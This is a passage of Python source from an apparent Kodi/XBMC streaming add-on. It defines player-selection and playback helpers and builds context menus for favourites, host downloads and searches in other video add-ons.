elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
listitem=xbmcgui.ListItem(title,iconImage=img,thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); #PL.add(stream_url,listitem)
#
html=nURL(stream_url); deb('Length of html',str(len(html)));
matches=re.compile('\n+\s*(.*?://.*)\s*\n+').findall(html)
#debob(matches)
if len(matches) > 0:
for match in matches:
#debob(match)
PL.add(match,listitem)
#
try: _addon.resolve_url(url)
except: t=''
try: play=xbmc.Player(PlayerMeth); play.play(PL)
except: t=''
def PlayItCustomL2A(url,stream_url,img,title,studio=''):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
listitem=xbmcgui.ListItem(title,iconImage=img,thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); #PL.add(stream_url,listitem)
html=nURL(stream_url); deb('Length of html',str(len(html)));
html=html.replace('#EXT-X-STREAM-INF:PROGRAM-ID=','#EXT-X-STREAM-INF:NAME="'+title+'",PROGRAM-ID=')
PlaylistFile=xbmc.translatePath(os.path.join(_addonPath,'resources','playlist.txt')); debob(PlaylistFile)
_SaveFile(PlaylistFile,html)
PL.add(PlaylistFile,listitem)
try: _addon.resolve_url(url)
except: t=''
try: play=xbmc.Player(PlayerMeth); play.play(PL)
except: t=''
def PlayItCustomMT(url,stream_url,img,title,studio=''):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
import proxy; axelhelper=proxy.ProxyHelper()
MultiThread_url=axelhelper.create_proxy_url(stream_url)
###
listitem=xbmcgui.ListItem(thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); PL.add(MultiThread_url,listitem)
try: _addon.resolve_url(url)
except: t=''
try: play=xbmc.Player(PlayerMeth); play.play(PL)
except: t=''
def PlayItCustom(url,stream_url,img,title,studio=''):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
listitem=xbmcgui.ListItem(thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); PL.add(stream_url,listitem)
try: _addon.resolve_url(url)
except: t=''
try: play=xbmc.Player(PlayerMeth); play.play(PL)
except: t=''
def PlayURL(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
try: _addon.resolve_url(url)
except: t=''
wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
deb("MarkAsWatched",str(wwB));
infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
deb('url',url)
try:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
play.play(url,li)
except:
try: play.play(url)
except:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode to watched list",wwT); visited_remove(wwT);
def PlayURL1(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
try: _addon.resolve_url(url)
except: t=''
wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
deb("MarkAsWatched",str(wwB));
try:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
play.play(url)
except:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode to watched list",wwT); visited_remove(wwT);
def PlayURLs(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
filename=xbmc.translatePath(os.path.join(_addonPath,'resources','test.strm'))
try: _addon.resolve_url(url)
except: pass
if ':' in url: uPre=url.split(':')[0]
else: uPre='____'
if (uPre.lower()=='mss') or (uPre.lower()=='mssh') or (uPre.lower()=='rtsp'):
_SaveFile(filename,url)
try: play.play(filename) #(url)
except: pass
elif (uPre.lower()=='http'):
import urlresolver
try:
stream_url=urlresolver.HostedMediaFile(url).resolve()
play.play(stream_url)
except:
try: play.play(url)
except: pass
else:
try: play.play(url)
except: pass
#
def PlayURLs2(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
filename=xbmc.translatePath(os.path.join(_addonPath,'resources','test.strm'))
try: _addon.resolve_url(url)
except: pass
if ':' in url: uPre=url.split(':')[0]
else: uPre='____'
if (uPre.lower()=='mss') or (uPre.lower()=='mssh') or (uPre.lower()=='rtsp'):
_SaveFile(filename,url)
try: play.play(filename) #(url)
except: pass
else:
try: play.play(url)
except: pass
def PlayURLstrm(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
filename=xbmc.translatePath(os.path.join(_addonPath,'resources','test.strm'))
_SaveFile(filename,url)
try: _addon.resolve_url(url)
except: t=''
try: play.play(filename) #(url)
except: t=''
def PlayVideo(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#import urlresolver
infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
#xbmc.Player().stop()
try: _addon.resolve_url(url)
except: t=''
try: play.play(url, li)
except: t=''
def PlayFromHost(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
import urlresolver
infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
deb('url',url)
###
#try: _addon.resolve_url(url)
#except: t=''
#stream_url='http://s6.vidcache.net/stream/a4133ca7743c0a0f4ff063f715d934472bb1d513?client_file_id=524368'
#play.play(stream_url, li)
###
if ('youtube.com' in url):
stream_url=url
else:
debob(urlresolver.HostedMediaFile(url))
#stream_url = urlresolver.HostedMediaFile(url).resolve()
try: stream_url = urlresolver.HostedMediaFile(url).resolve()
except: deb('Link URL Was Not Resolved',url); myNote("urlresolver.HostedMediaFile(url).resolve()","Failed to Resolve Playable URL."); return
try: debob(stream_url) #deb('stream_url',stream_url)
except: t=''
#xbmc.Player().stop()
try: _addon.resolve_url(url)
except: t=''
wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
deb("MarkAsWatched",str(wwB));
try:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
play.play(stream_url,li);
except:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode to watched list",wwT); visited_remove(wwT);
t='';
def PlayFromHostMT(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
import urlresolver
infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
deb('url',url)
###
#try: _addon.resolve_url(url)
#except: t=''
#stream_url='http://s6.vidcache.net/stream/a4133ca7743c0a0f4ff063f715d934472bb1d513?client_file_id=524368'
#play.play(stream_url, li)
###
if ('youtube.com' in url):
stream_url=url
else:
debob(urlresolver.HostedMediaFile(url))
#stream_url = urlresolver.HostedMediaFile(url).resolve()
try: stream_url = urlresolver.HostedMediaFile(url).resolve()
except: deb('Link URL Was Not Resolved',url); myNote("urlresolver.HostedMediaFile(url).resolve()","Failed to Resolve Playable URL."); return
try: debob(stream_url) #deb('stream_url',stream_url)
except: t=''
#xbmc.Player().stop()
try: _addon.resolve_url(url)
except: t=''
wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
deb("MarkAsWatched",str(wwB));
#from axel.downloader import proxy;
import proxy;
axelhelper=proxy.ProxyHelper()
axelhelper.playUrl(stream_url);
#print axelhelper.download(urlhere);
#MultiThread_url=axelhelper.create_proxy_url(stream_url)
###
#play.play(MultiThread_url,li);
return
try:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
#play.play(stream_url,li);
play.play(MultiThread_url,li);
except:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode to watched list",wwT); visited_remove(wwT);
t='';
### ############################################################################################################
### ############################################################################################################
def filename_filter_out_year(name=''):
years=re.compile(' \((\d+)\)').findall('__'+name+'__')
for year in years:
name=name.replace(' ('+year+')','')
name=name.strip()
return name
def QP(v): return urllib.quote_plus(v)
def DoLabs2LB(labs,subfav=''):
LB={}
n='title'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='year'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='img'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='fanart'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='plot'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='url'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='country'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='genres'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='todoparams'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='commonid'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='commonid2'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='plot'
try: LB[n]=str(labs[n])
except: LB[n]=''
n='site'
try: LB[n]=labs[n]
except:
try: LB[n]=addpr(n,'')
except: LB[n]=''
n='section'
try: LB[n]=labs[n]
except:
try: LB[n]=addpr(n,'')
except: LB[n]=''
##try: LB['subfav']=subfav
##except: LB['subfav']=''
#n=''
#try: LB[n]=labs[n]
#except: LB[n]=''
return LB
def ContextMenu_Favorites(labs={}):
contextMenuItems=[]; nameonly=filename_filter_out_year(labs['title'])
try: site=labs['site']
except: site=addpr('site','')
try: section=labs['section']
except: section=addpr('section','')
try: _subfav=addpr('subfav','')
except: _subfav=''
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
try:
if _subfav=='': _sf='1'
else: _sf=_subfav
WRFC=ps('WhatRFavsCalled')
LB=DoLabs2LB(labs); LB['mode']='cFavoritesAdd'; P1='XBMC.RunPlugin(%s)'
#if _sf is not '1': LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.1.name'),Pars))
#if _sf is not '2': LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.2.name'),Pars))
#if _sf is not '3': LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.3.name'),Pars))
#if _sf is not '4': LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.4.name'),Pars))
#if _sf is not '5': LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.5.name'),Pars))
#if _sf is not '6': LB['subfav']='6'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.6.name'),Pars))
#if _sf is not '7': LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.7.name'),Pars))
LB['mode']='cFavoritesRemove'; LB['subfav']=_subfav; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append(('Remove',Pars)) #'Remove: '+WRFC+addst('fav.tv.'+_sf+'.name'),Pars))
except: pass
return contextMenuItems
def ContextMenu_Movies(labs={}):
contextMenuItems=[]; nameonly=filename_filter_out_year(labs['title'])
try: site=labs['site']
except: site=addpr('site','')
try: section=labs['section']
except: section=addpr('section','')
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Movie Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
if (tfalse(addst("CMI_SearchKissAnime"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.kissanime')): contextMenuItems.append(('Search KissAnime', 'XBMC.Container.Update(%s?mode=%s&pageno=1&pagecount=1&title=%s)' % ('plugin://plugin.video.kissanime/','Search',nameonly)))
if (tfalse(addst("CMI_SearchSolarMovieso"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.solarmovie.so')): contextMenuItems.append(('Search Solarmovie.so', 'XBMC.Container.Update(%s?mode=%s§ion=%s&title=%s)' % ('plugin://plugin.video.solarmovie.so/','Search','movies',nameonly)))
if (tfalse(addst("CMI_Search1Channel"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.1channel')): contextMenuItems.append(('Search 1Channel', 'XBMC.Container.Update(%s?mode=7000§ion=%s&query=%s)' % ('plugin://plugin.video.1channel/','movies',nameonly)))
#if os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.merdb'): contextMenuItems.append(('Search MerDB', 'XBMC.Container.Update(%s?mode=%s§ion=%s&url=%s&title=%s)' % ('plugin://plugin.video.merdb/','Search','movies',urllib.quote_plus('http://merdb.ru/'),nameonly)))
#if os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.icefilms'): contextMenuItems.append(('Search Icefilms','XBMC.Container.Update(%s?mode=555&url=%s&search=%s&nextPage=%s)' % ('plugin://plugin.video.icefilms/', 'http://www.icefilms.info/', title, '1')))
try:
WRFC=ps('WhatRFavsCalled')
LB=DoLabs2LB(labs); LB['mode']='cFavoritesAdd'; P1='XBMC.RunPlugin(%s)'
LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.1.name'),Pars))
LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.2.name'),Pars))
#LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.3.name'),Pars))
#LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.4.name'),Pars))
#LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.5.name'),Pars))
#LB['subfav']='6'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.6.name'),Pars))
#LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.7.name'),Pars))
except: pass
return contextMenuItems
def ContextMenu_Series(labs={},TyP='tv'):
contextMenuItems=[]; nameonly=filename_filter_out_year(labs['title'])
try: site=labs['site']
except: site=addpr('site','')
try: section=labs['section']
except: section=addpr('section','')
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Show Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
if (tfalse(addst("CMI_FindAirDates"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.solarmovie.so')): contextMenuItems.append(('Find AirDates', 'XBMC.Container.Update(%s?mode=%s&title=%s)' % ('plugin://plugin.video.solarmovie.so/','SearchForAirDates',labs['title'])))
if (tfalse(addst("CMI_SearchKissAnime"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.kissanime')): contextMenuItems.append(('Search KissAnime', 'XBMC.Container.Update(%s?mode=%s&pageno=1&pagecount=1&title=%s)' % ('plugin://plugin.video.kissanime/','Search',nameonly)))
if (tfalse(addst("CMI_SearchSolarMovieso"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.solarmovie.so')): contextMenuItems.append(('Search Solarmovie.so', 'XBMC.Container.Update(%s?mode=%s§ion=%s&title=%s)' % ('plugin://plugin.video.solarmovie.so/','Search','tv',nameonly)))
if (tfalse(addst("CMI_Search1Channel"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.1channel')): contextMenuItems.append(('Search 1Channel', 'XBMC.Container.Update(%s?mode=7000§ion=%s&query=%s)' % ('plugin://plugin.video.1channel/','tv',nameonly)))
if (tfalse(addst("CMI_SearchMerDBru"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.merdb')): contextMenuItems.append(('Search MerDB', 'XBMC.Container.Update(%s?mode=%s§ion=%s&url=%s&title=%s)' % ('plugin://plugin.video.merdb/','Search','tvshows',urllib.quote_plus('http://merdb.ru/tvshow/'),nameonly)))
if (tfalse(addst("CMI_SearchIceFilms"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.icefilms')): contextMenuItems.append(('Search Icefilms','XBMC.Container.Update(%s?mode=555&url=%s&search=%s&nextPage=%s)' % ('plugin://plugin.video.icefilms/', 'http://www.icefilms.info/', labs['title'], '1')))
try:
WRFC=ps('WhatRFavsCalled'); WRFCr='Remove: '
LB=DoLabs2LB(labs); McFA='cFavoritesAdd'; McFR='cFavoritesRemove'; LB['mode']=McFA; P1='XBMC.RunPlugin(%s)'
#LB['mode']=McFA; LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.1.name'),Pars))
LB['subfav']='1';
if fav__COMMON__check(LB['site'],LB['section'],LB['title'],LB['year'],LB['subfav'])==True: LB['mode']=McFR; LabelName=WRFCr+WRFC+'Films - Movies'; #addst('fav.tv.'+LB['subfav']+'.name');
else: LB['mode']=McFA; LabelName=WRFC+addst('fav.tv.'+LB['subfav']+'.name');
if TyP=='movie':
LB['subfav']=''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((LabelName,Pars));
else:
for nn in ['2']: #,'3','4','5','6','7']:
LB['subfav']=nn;
if fav__COMMON__check(LB['site'],LB['section'],LB['title'],LB['year'],LB['subfav'])==True: LB['mode']=McFR; LabelName=WRFCr+WRFC+'Seriale - TV Shows'; #addst('fav.tv.'+LB['subfav']+'.name');
else: LB['mode']=McFA; LabelName=WRFC+addst('fav.tv.'+LB['subfav']+'.name');
Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((LabelName,Pars));
#LB['mode']=McFA; LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.2.name'),Pars))
#LB['mode']=McFA; LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.3.name'),Pars))
#LB['mode']=McFA; LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.4.name'),Pars))
#LB['mode']=McFA; LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.5.name'),Pars))
#LB['mode']=McFA; LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.7.name'),Pars))
if (tfalse(addst("CMI_RefreshMetaData","true"))==True): LB['mode']='refresh_meta'; LabelName='Refresh MetaData'; LB['imdb_id']=LB['commonid']; LB['alt_id']='imdbnum'; LB['video_type']='tvshow'; LB['year']; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((LabelName,Pars));
except: pass
return contextMenuItems
def ContextMenu_Episodes(labs={}):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Episode Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
return contextMenuItems
def ContextMenu_Hosts(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
#if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Host Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
if tfalse(addst("CMI_JDownloaderResolver"))==True: contextMenuItems.append(('JDownloader (UrlResolver)','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s)' % ('plugin://'+ps('addon_id')+'/','toJDownloader',urllib.quote_plus(labs['url']),'true')))
if tfalse(addst("CMI_JDownloader"))==True: contextMenuItems.append(('JDownloader (Url)','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s)' % ('plugin://'+ps('addon_id')+'/','toJDownloader',urllib.quote_plus(labs['url']),'false')))
if ('destfile' in labs) and (len(addst('download_folder_default','')) > 0):
contextMenuItems.append(('Download','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s&destpath=%s&destfile=%s)' % ('plugin://'+ps('addon_id')+'/','Download',urllib.quote_plus(labs['url']),'true',urllib.quote_plus(addst('download_folder_default','')),urllib.quote_plus(labs['destfile']) ) ))
#elif ('title' in labs) and (len(addst('download_folder_default','')) > 0):
return contextMenuItems
def ContextMenu_LiveStreams(labs={},contextMenuItems=[]):
contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
try: site=labs['site']
except: site=addpr('site','')
try: section=labs['section']
except: section=addpr('section','')
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Stream Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
try:
WRFC=ps('WhatRFavsCalled')
LB=DoLabs2LB(labs); LB['mode']='cFavoritesAdd'; P1='XBMC.RunPlugin(%s)'
LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.1.name'),Pars))
LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.2.name'),Pars))
LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.3.name'),Pars))
